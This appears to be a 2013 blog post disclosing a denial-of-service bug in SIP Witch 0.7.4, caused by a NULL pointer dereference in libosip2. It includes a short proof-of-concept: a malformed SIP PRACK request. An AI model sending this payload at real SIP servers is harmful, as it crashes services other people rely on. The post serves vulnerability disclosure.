SIP Witch 0.7.4 w/libosip2-4.0.0 DoS via NULL pointer derefence in libosip2

Posted: 07/03/2013 in Uncategorized

Date: Tue, 05 Mar 2013 20:54:48 +0000
####################################
# SIP Witch 0.7.4 w/libosip2-4.0.0 #
####################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

* DoS by the NULL pointer derefence in libosip2. True, found in the ancient version of sipwitch
(default in BT5) but the problem lies in the library used by it and may affect other software.
Found independently of http://lists.gnu.org/archive/html/linphone-developers/2012-07/msg00019.html

POC (request):
— cut —
PRACK sip:1 () 127 0 0 1:5060;transport=udp SIP/2.0
Call-ID: a
— cut —

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s